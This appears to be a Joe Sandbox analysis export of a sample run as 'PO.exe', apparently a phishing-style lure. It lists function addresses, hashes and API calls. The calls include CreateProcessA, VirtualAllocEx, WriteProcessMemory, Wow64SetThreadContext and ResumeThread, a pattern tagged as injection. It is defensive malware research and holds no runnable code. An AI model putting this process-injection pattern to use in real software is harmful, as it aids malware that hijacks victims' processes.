Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: 682ec06193ec08a96ee20d48df632dcb16f035f2393fa1e51912c9b6643e3ddc
Instruction ID: c033ff97c95a61bcc59b921e88b2ce786065e5c37f3126b7022cf0f284e55ba9
Opcode Fuzzy Hash: 682ec06193ec08a96ee20d48df632dcb16f035f2393fa1e51912c9b6643e3ddc
Instruction Fuzzy Hash: 0A1171303012052BDF298B3DDC40B6E3799DFA1794B04C129F4988B191DF60DD418395

Function 00C71180 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00C73D4B: GetWindowRect.USER32(?,?), ref: 00C73D82
Part of subcall function 00C73D4B: GetClientRect.USER32(?,?), ref: 00C73D8E
Part of subcall function 00C73D4B: GetWindowLongW.USER32(?,000000F0), ref: 00C73E2F
Part of subcall function 00C73D4B: GetWindowRect.USER32(?,?), ref: 00C73E5C
Part of subcall function 00C73D4B: GetWindowTextW.USER32(?,?,00000400), ref: 00C73E7B

GetDlgItem.USER32(00000000,00003021), ref: 00C711C4
SetWindowTextW.USER32(00000000,00C95294), ref: 00C711DA

Strings

0, xrefs: 00C71183

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: Window$Rect$Text$ClientItemLong
String ID: 0
API String ID: 660763476-4108050209
Opcode ID: 4c70a2951676bd25e644d7d7f860405bf0e843b81ac70a73136afb7c4190e800
Instruction ID: 97fd322e095bed615853b77b5a9618ffcf62bdfc0b0e6841a6918b1be7418c0c
Opcode Fuzzy Hash: 4c70a2951676bd25e644d7d7f860405bf0e843b81ac70a73136afb7c4190e800
Instruction Fuzzy Hash: 7EF06970100289A7DF151FE5C80DBED3B9EAB1430AF88C028FE5C981A1CB748B99EA10

Function 00C77361 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00C773AA

Strings

z%s%d, xrefs: 00C7738A
z%s%02d, xrefs: 00C7739F

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: _swprintf
String ID: z%s%02d$z%s%d
API String ID: 589789837-468824935
Opcode ID: 139c372b7449e5f75378416fe0a262c87bde7d52015d3ac6be3b52a47fdd684c
Instruction ID: b8cf1dcb91d75a5bdf9ad1f943020e48c33c938c0e58c2cf55aff51517e8b9f7
Opcode Fuzzy Hash: 139c372b7449e5f75378416fe0a262c87bde7d52015d3ac6be3b52a47fdd684c
Instruction Fuzzy Hash: C7F0CDB050460CABDF019E40CC46CADB719FB48300F00C261FE185A262E6719A14A7A0

Analysis Process: PO.exePID: 7400, Parent PID: 7044COMMON

Execution Graph

Execution Coverage:	11%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	213
Total number of Limit Nodes:	6

Executed Functions

Function 0A7202A4 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2161091943.000000000A720000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a720000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42ecd1fb5ad2fbe7a141f0748159f1ee0c30bb5464349ba8921a4c19445bc45f
Instruction ID: f36eb4c99e2ee9462b7f2cab5949d67db3609220430810f319b709db5ea3c8e4
Opcode Fuzzy Hash: 42ecd1fb5ad2fbe7a141f0748159f1ee0c30bb5464349ba8921a4c19445bc45f
Instruction Fuzzy Hash: 2AD052B8C09228CFC720DF50C8505F8F7B8BB0E324F0062AAC44AA7222E7308C55CF24

Function 074DC76C Relevance: 1.7, APIs: 1, Instructions: 249
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 074DC9AE

Memory Dump Source

Source File: 00000007.00000002.2160300489.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_74d0000_PO.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: ead12e19f55ba28323bd9b122fbbe13cbdf6bcc7f1be25e95811c725139066cb
Instruction ID: e416eba974b73fa24e3acd0abe4e3e8aa1fb25639ed30f87508e59439593a18b
Opcode Fuzzy Hash: ead12e19f55ba28323bd9b122fbbe13cbdf6bcc7f1be25e95811c725139066cb
Instruction Fuzzy Hash: 13A15DB1D0021ACFDB10CF68C991BDEBBB2BF49314F14856AE859A7240DB749985CFA1

Function 074DC778 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 074DC9AE

Memory Dump Source

Source File: 00000007.00000002.2160300489.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_74d0000_PO.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: fa51e22a4112e7eb30ab11370c671dc4634fc8474325bbb5d42cafa07a4e917a
Instruction ID: 5d7896864d590b4b734dd7dfa4cd11b29de0077cfe72fabf14e96b9f14adeb64
Opcode Fuzzy Hash: fa51e22a4112e7eb30ab11370c671dc4634fc8474325bbb5d42cafa07a4e917a
Instruction Fuzzy Hash: 17915DB1D0021ACFDB10DF68C990BDEBBB2BF49314F14856AE859A7240DB749985CFA1

Function 0171B360 Relevance: 1.7, APIs: 1, Instructions: 207
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0171B5C6

Memory Dump Source

Source File: 00000007.00000002.2153951087.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: c3293e308be4e01b4566ece02dff3640498d5418aa08f96f3fc05b8972f067e7
Instruction ID: 2a18048642b1b0e02ea4c2da27fb0e696463cbe468012657ef6374708fc75ada
Opcode Fuzzy Hash: c3293e308be4e01b4566ece02dff3640498d5418aa08f96f3fc05b8972f067e7
Instruction Fuzzy Hash: B28134B0A00B058FD764DF6DD44476ABBF1FF88204F10892ED88ADBA54DB75E949CB90

Function 0171ADE0 Relevance: 1.6, APIs: 1, Instructions: 79
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0171B641,00000800,00000000,00000000), ref: 0171B832

Memory Dump Source

Source File: 00000007.00000002.2153951087.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: fb3cfe3e3cb0fd0a3e3515ce55c80df32dbe7743bfbba49c6cc7342b1dd0fee3
Instruction ID: a58b4dd03c697d33b8234ad984abc2ca0190850d58e96006f8103874be92d317
Opcode Fuzzy Hash: fb3cfe3e3cb0fd0a3e3515ce55c80df32dbe7743bfbba49c6cc7342b1dd0fee3
Instruction Fuzzy Hash: 81318BB2C093898FDB11CFAEC845AAAFFF4EF99310F48809ED555A7215C3749509CBA1

Function 074DC4E8 Relevance: 1.6, APIs: 1, Instructions: 72
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 074DC580

Memory Dump Source

Source File: 00000007.00000002.2160300489.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_74d0000_PO.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 1a59047cb11b2453fc6e0d7db34947ed2af10c225b1cbdc8cb88a384039daab2
Instruction ID: 6d7724c51d7ec53a40911dffe018a069af76118941c14fc495e05dd79405dcf6
Opcode Fuzzy Hash: 1a59047cb11b2453fc6e0d7db34947ed2af10c225b1cbdc8cb88a384039daab2
Instruction Fuzzy Hash: 0F215AB19003199FCB10DFA9C881BEEBBF5FF48310F10842AE959A7240C7789944DBA0

Function 074DC4F0 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 074DC580

Memory Dump Source

Source File: 00000007.00000002.2160300489.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_74d0000_PO.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 13858ee57a7a11eede6d87778a7e2d0d249356373ac2a737a4f1630457ccf8cf
Instruction ID: ec9c3c8de7cc365593fe532cb55a2a599a98c517e7b2ce3ee3c002557c12fd1a
Opcode Fuzzy Hash: 13858ee57a7a11eede6d87778a7e2d0d249356373ac2a737a4f1630457ccf8cf
Instruction Fuzzy Hash: FB2139B59003599FCB10CFA9C885BEEBBF5FF48310F10842AE959A7240C7789944DBA4

Function 074DC5D8 Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 074DC660

Memory Dump Source

Source File: 00000007.00000002.2160300489.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_74d0000_PO.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 49d7efd13e10807bf2ac7fb548153d336135726e951421fe5d88ddb240c7f786
Instruction ID: 052dc8d5a42b6deb048ec6c1d261a69d02f8a8c8c80a6a41a2d5b8c25d3fb846
Opcode Fuzzy Hash: 49d7efd13e10807bf2ac7fb548153d336135726e951421fe5d88ddb240c7f786
Instruction Fuzzy Hash: C32128B1D003599FCB10DFAAC881AEEFBF5FF48320F14842AE559A7240D7349944DBA4

Function 074DBAE0 Relevance: 1.6, APIs: 1, Instructions: 66
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 074DBB66

Memory Dump Source

Source File: 00000007.00000002.2160300489.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_74d0000_PO.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: d3efe4bbed3567a6f30f3c65ebf0e4ec89e34e069c0e351b3d922266abc371f9
Instruction ID: 3d6bb8faf6d9fe978fb994f253aff59313b07c00f8cdffce32fe25492d0edd16
Opcode Fuzzy Hash: d3efe4bbed3567a6f30f3c65ebf0e4ec89e34e069c0e351b3d922266abc371f9
Instruction Fuzzy Hash: 94216AB1D003099FDB10DFAAC885BEEBBF4EF48320F14842AD559A7241CB789944CFA4

Function 074DC5E0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 074DC660

Memory Dump Source

Source File: 00000007.00000002.2160300489.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_74d0000_PO.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 90bcb04d74e1e4db7740ca0962f609a7883ddd920f77829bb039bc84830a496f
Instruction ID: 348d39c09017f3f2d71cc6fb39ad1cc9f5a5802482f3c347b89f33c196da6df6
Opcode Fuzzy Hash: 90bcb04d74e1e4db7740ca0962f609a7883ddd920f77829bb039bc84830a496f
Instruction Fuzzy Hash: 03213AB1C003599FCB10DFAAC880AEEFBF5FF48320F10842AE559A7240C7349944DBA4

Function 074DBAE8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 074DBB66

Memory Dump Source

Source File: 00000007.00000002.2160300489.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_74d0000_PO.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: d777fb9fb20f14780da3c21913e7409f3fe7d0577f874643ef30c2cb7e630c4e
Instruction ID: 58f3ace92a47135ab25b11d95522363ae41ead84c7af975ad73625d7869acca5
Opcode Fuzzy Hash: d777fb9fb20f14780da3c21913e7409f3fe7d0577f874643ef30c2cb7e630c4e
Instruction Fuzzy Hash: 28212CB1D003099FDB10DFAAC985BEEBBF4EF48324F14842AD559A7241DB789944CFA4

Function 074DC428 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 074DC49E

Memory Dump Source

Source File: 00000007.00000002.2160300489.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_74d0000_PO.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d599054552e6bc109d20951ca33857a8cc0f8c11e03efca6c105da6322f095d7
Instruction ID: 96fcd571f569a62311460f034244acf9a312894381e582167e2a783ad8aaf625
Opcode Fuzzy Hash: d599054552e6bc109d20951ca33857a8cc0f8c11e03efca6c105da6322f095d7
Instruction Fuzzy Hash: 65117CB29002499FCB10DFA9C845BEFBFF5EF88324F14841AE515A7250C7359940CFA0

Function 0171ADF8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0171B641,00000800,00000000,00000000), ref: 0171B832

Memory Dump Source

Source File: 00000007.00000002.2153951087.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 037195ccb37743ba8f40083bc274d918fbb187639bbf0a056db03b2a90209a56
Instruction ID: 7c242ab98f5ccc5135f1ad53d9c18a1dc18c549a8cded2a3fb230d8ea90e54b8
Opcode Fuzzy Hash: 037195ccb37743ba8f40083bc274d918fbb187639bbf0a056db03b2a90209a56
Instruction Fuzzy Hash: 0411D3B69042499FDB10CF9AD844A9EFBF4EB88720F14846ED919A7200C375A945CFA5

Function 0171B7C0 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0171B641,00000800,00000000,00000000), ref: 0171B832

Memory Dump Source

Source File: 00000007.00000002.2153951087.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 64e189ca689d6489e9a3342cb5828b0b3aa24f364c4d89c72a1c48483061c5ae
Instruction ID: 95bbec45dfaebdf03f6bfaac0eff2d3dbaf2acc99b56106101990ed45828d4b9
Opcode Fuzzy Hash: 64e189ca689d6489e9a3342cb5828b0b3aa24f364c4d89c72a1c48483061c5ae
Instruction Fuzzy Hash: 3D1114B6C003498FDB10CF9AD844ADEFBF5EB88310F14842AD919A7200C375A945CFA4

Function 074DC430 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 074DC49E

Memory Dump Source

Source File: 00000007.00000002.2160300489.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_74d0000_PO.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f0f36189adcc1ed598712fd93a9d1e3452104a8084545940efd764fbb070aae1
Instruction ID: 211108aab7105bdbfb3b2312ee0faadd20fea7b7e9f2626a84602e152583c8b6
Opcode Fuzzy Hash: f0f36189adcc1ed598712fd93a9d1e3452104a8084545940efd764fbb070aae1
Instruction Fuzzy Hash: 6C1149769002499FCB10DFAAC844AEFBFF5EF88324F14841AE559A7250CB759944DFA0

Function 074DBA30 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 074DBA9A

Memory Dump Source

Source File: 00000007.00000002.2160300489.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_74d0000_PO.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 54af3c588a33f5709a780d157da5532b493e853d02b5b83aa3bf095b8c587949
Instruction ID: 59c5b5fb4a4ec488c0825ef6a82a6eafc56442f57390b16502e1e057dc4206a6
Opcode Fuzzy Hash: 54af3c588a33f5709a780d157da5532b493e853d02b5b83aa3bf095b8c587949
Instruction Fuzzy Hash: 5E112BB1D002498FDB20DFAAC9457EEFBF5EB88324F14841AD559A7340CB756944CB94

Function 074DBA38 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 074DBA9A

Memory Dump Source

Source File: 00000007.00000002.2160300489.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_74d0000_PO.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: f8b4aa477e2813223c00a4ecaedb48c0b27519643ae361912af4f5c94f9e8b9d
Instruction ID: 4f25d688c2a2e153c2f50306284bd9b2a16198ce2f1aeb57d83f96f0ff9fb5d0
Opcode Fuzzy Hash: f8b4aa477e2813223c00a4ecaedb48c0b27519643ae361912af4f5c94f9e8b9d
Instruction Fuzzy Hash: 5E1128B19002498BDB20DFAAC8457EEFBF5EB88324F14841AD559A7240CB756944CBA4

Function 0171B560 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0171B5C6

Memory Dump Source

Source File: 00000007.00000002.2153951087.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 5d07c599007a7de9108c02ab2b73ee2bbe88bf88a17d06ff9acc7c8cde02dae3
Instruction ID: 5694e48f69f1aab3dc2ce48f373dcd97036957e57f5be294542caa7ed521b7d5
Opcode Fuzzy Hash: 5d07c599007a7de9108c02ab2b73ee2bbe88bf88a17d06ff9acc7c8cde02dae3
Instruction Fuzzy Hash: 2E110FB6C002498FDB10CF9AD844A9EFBF8EB88320F20842AD529B7600C375A545CFA1

Function 0A720424 Relevance: 1.3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

Strings

(, xrefs: 0A7203E1

Memory Dump Source

Source File: 00000007.00000002.2161091943.000000000A720000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a720000_PO.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 0ebaeb4850ffccedc46a0b5765025bfaa495b7b3a71599ccbd39c7a2d128f910
Instruction ID: d1002de406903719f51e561055e319caa680ffc8972d13af4a82d68e91568582
Opcode Fuzzy Hash: 0ebaeb4850ffccedc46a0b5765025bfaa495b7b3a71599ccbd39c7a2d128f910
Instruction Fuzzy Hash: 7001C93590A268DFEB20CB64CD44BEDBBB8FB0A315F1491D9D409A3252C3359E86CF50

Function 0A720119 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2161091943.000000000A720000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a720000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30d49d99eca08865b2511d137c2a8c01c2703d9b6c36fd7ce78c1cdb5f85d8cd
Instruction ID: 2b8d958c80d3214a3a05233399c773faea6d0f6c8b7652e12dbbfc621e986c80
Opcode Fuzzy Hash: 30d49d99eca08865b2511d137c2a8c01c2703d9b6c36fd7ce78c1cdb5f85d8cd
Instruction Fuzzy Hash: 24412874D08268DFDB61CF64C890BE8BBB5BB4A300F0081EAD099A7691DB745EC5CF50

Function 0154D06C Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2153413470.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_154d000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 479543aed46f89bf2f422c9fe8ed063510e1425a92c3980c537b4ab2868ec6fe
Instruction ID: 0e537441b9925b653b3957441e84fc13c3710699e036776f57e69e7658c26993
Opcode Fuzzy Hash: 479543aed46f89bf2f422c9fe8ed063510e1425a92c3980c537b4ab2868ec6fe
Instruction Fuzzy Hash: 07213672104200DFCB16DF98C9C4B2ABFB5FB98318F248568ED091F246C33AD416CBA1

Function 0155D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2153531087.000000000155D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0155D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_155d000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07bb12886bedd169d1dd8566cc786916f531c5d56077281e839b1fbf72a11d7a
Instruction ID: fbf6f4a3e83bcb789a66d981fe4905b51fe5bd5c7d7e2eea84b8278bbcfe8bac
Opcode Fuzzy Hash: 07bb12886bedd169d1dd8566cc786916f531c5d56077281e839b1fbf72a11d7a
Instruction Fuzzy Hash: 67210376504200DFDB55DF58D990B2ABBB5FB84324F20C96EDC094F266D33AD407CA61

Function 0155D2C8 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2153531087.000000000155D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0155D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_155d000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 283e4e78ecf6c01ed93b2f92160b5456b88b3ae8d138117d32476d547b3b544f
Instruction ID: 15e1f13456fcb75ab961357dfad09d709dd0088d786e40402613c2a3a4def06d
Opcode Fuzzy Hash: 283e4e78ecf6c01ed93b2f92160b5456b88b3ae8d138117d32476d547b3b544f
Instruction Fuzzy Hash: B121D372604200DFDB45DF98D594B2ABBB5FB84324F24C96EDC094F257C33AD406CA61

Function 0A720B95 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2161091943.000000000A720000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a720000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 377d49ebcbfbf6fe94b6e655a8977507c5ad05bef82461e94d417a1ca77c76ed
Instruction ID: 64e49a6f93e8adb224d961df7002241962080e09733b73cc86c5be23bb206a63
Opcode Fuzzy Hash: 377d49ebcbfbf6fe94b6e655a8977507c5ad05bef82461e94d417a1ca77c76ed
Instruction Fuzzy Hash: 5321E675D4922ADEEB34CF65D8443E9F6B5BF8A311F00A5A6D409A2111E7704ECACF50

Function 0155D005 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2153531087.000000000155D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0155D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_155d000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c95c66f02616327e813a77a26e5ba638c529f34ff5fd71537826daf5be79e141
Instruction ID: 39aa39f7defaa2991a2b7f04b06ea8f6fde60019c98cfaa34be93aa9f7210671
Opcode Fuzzy Hash: c95c66f02616327e813a77a26e5ba638c529f34ff5fd71537826daf5be79e141
Instruction Fuzzy Hash: 6B2171755083849FDB03CF64D994715BF71FB46214F28C5DAD8498F2A7D33A9806CB62

Function 0A720476 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2161091943.000000000A720000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a720000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1df4e86407f2744e88fea973c5dc7f5c54d68157690f3ae17af40ed405b30fa
Instruction ID: 2ae0352c387f5389f7098522caacc68e4f42b9e2c3869b8ee5cba2f7dc10755e
Opcode Fuzzy Hash: a1df4e86407f2744e88fea973c5dc7f5c54d68157690f3ae17af40ed405b30fa
Instruction Fuzzy Hash: A421C538E08228DFDB64CF54C884BEDBBB9BB49311F109099D40EA7256D7355E86CF50

Function 0154D067 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2153413470.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_154d000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3b49ebb3647464524db950c25b84bc30cf7f483e8b35816b047356ddc5e1881
Instruction ID: 1e210707e8439199799c5928b4344f23c14a74a0772dbe65daad51b6a011ed94
Opcode Fuzzy Hash: f3b49ebb3647464524db950c25b84bc30cf7f483e8b35816b047356ddc5e1881
Instruction Fuzzy Hash: 2A21AC76504280DFDB06CF44D9C4B1ABF72FB98318F2482A9DD491A256C33AD426CB91

Function 0A721E90 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2161091943.000000000A720000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a720000_PO.jbxd

Similarity

API ID:
